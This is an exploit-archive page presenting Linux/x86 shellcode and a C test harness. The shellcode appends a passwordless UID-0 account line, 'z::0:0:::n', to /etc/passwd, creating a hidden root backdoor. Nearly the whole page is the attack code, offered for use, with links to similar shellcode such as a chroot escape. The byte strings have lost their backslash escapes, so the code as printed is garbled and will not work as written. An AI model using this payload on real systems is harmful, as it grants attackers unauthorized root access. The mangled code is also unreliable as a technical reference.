[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 add user 70 bytes
# Published : 2000-08-07
# Author : n/a
# Previous Title : linux/x86 execve /bin/sh toupper() evasion 55 bytes
# Next Title : linux/x86 break chroot setuid(0) + /bin/sh 132 bytes
/*
* Linux/x86
*
* Appends the line "z::0:0:::n" to /etc/passwd.
* (quite old, could be optimized further)
*/
#include <stdio.h>
char c0de[] =
/* main: */
"xebx29" /* jmp callz */
/* start: */
"x5e" /* popl %esi */
"x29xc0" /* subl %eax, %eax */
"x88x46x0b" /* movb %al, 0x0b(%esi) */
"x89xf3" /* movl %esi, %ebx */
"x66xb9x01x04" /* movw $0x401, %cx */
"x66xbaxb6x01" /* movw $0x1b6, %dx */
"xb0x05" /* movb $0x05, %al */
"xcdx80" /* int $0x80 */
"x93" /* xchgl %eax, %ebx */
"x29xc0" /* subl %eax, %eax */
"x29xd2" /* subl %edx, %edx */
"xb0x04" /* movb $0x04, %al */
"x89xf1" /* movl %esi, %ecx */
"x80xc1x0c" /* addb $0x0c, %cl */
"xb2x0a" /* movb $0x0a, %dl */
"xcdx80" /* int $0x80 */
"x29xc0" /* subl %eax, %eax */
"x40" /* incl %eax */
"xcdx80" /* int $0x80 */
/* callz: */
"xe8xd2xffxffxff" /* call start */
/* DATA */
"/etc/passwd"
"xff"
"z::0:0:::n";
main() {
int *ret;
ret=(int *)&ret +2;
printf("Shellcode lenght=%dn",strlen(c0de));
(*ret) = (int)c0de;
}
// www.Syue.com [2000-08-07]